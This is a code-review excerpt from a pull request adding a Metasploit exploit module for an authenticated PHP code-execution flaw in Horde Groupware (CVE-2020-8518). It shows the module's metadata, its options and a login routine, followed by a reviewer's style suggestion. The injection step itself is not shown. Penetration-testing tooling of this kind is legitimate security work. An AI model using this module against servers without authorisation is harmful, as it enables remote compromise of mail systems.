modules/exploits/multi/http/horde_csv_rce.rb

```diff
@@ -0,0 +1,138 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Horde CSV import arbitrary PHP code execution',
+        'Description'    => %q{
+
+          The Horde_Data module version 2.1.4 (and before) present in Horde
+          Groupware version 5.2.22 allows allows authenticated users to inject
+          arbitrary PHP code thus achieving RCE on the server hosting the web
+          application.
+
+        },
+        'License'        => MSF_LICENSE,
+        'Author'         => ['Andrea Cardaci <cyrus.and@gmail.com>'],
+        'References'     => [
+          ['CVE', '2020-8518'],
+          ['URL', 'https://cardaci.xyz/advisories/2020/03/10/horde-groupware-webmail-edition-5.2.22-rce-in-csv-data-import/']
+        ],
+        'DisclosureDate' => '2020-02-07',
+        'Platform'       => 'php',
+        'Arch'           => ARCH_PHP,
+        'Targets'        => [['Automatic', {}]],
+        'Payload'        => {'BadChars' => "'"},
+        'Privileged'     => false,
+        'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path to the web application', '/']),
+        OptString.new('USERNAME',  [true, 'The username to authenticate with']),
+        OptString.new('PASSWORD',  [true, 'The password to authenticate with'])
+      ])
+  end
+
+  def login
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri, 'login.php'),
+      'cookie'    => 'Horde=x', # avoid multiple Set-Cookie
+      'vars_post' => {
+        'horde_user' => username,
+        'horde_pass' => password,
+        'login_post' => '1'})
+    if not res or res.code != 302 or res.headers['Location'] != '/services/portal/'
+      fail_with(Failure::UnexpectedReply, 'Login failed or application not found')
+    else
+      vprint_good("Logged in as #{username}:#{password}")
+      return res.get_cookies
+    end
```

Comment:
Trying opting for `unless` over `if not`:

```suggestion
    unless res && res.code == 302 && res.headers['Location'] == '/services/portal/'
      fail_with(Failure::UnexpectedReply, 'Login failed or application not found')
    end
    
    vprint_good("Logged in as #{username}:#{password}")
    return res.get_cookies
```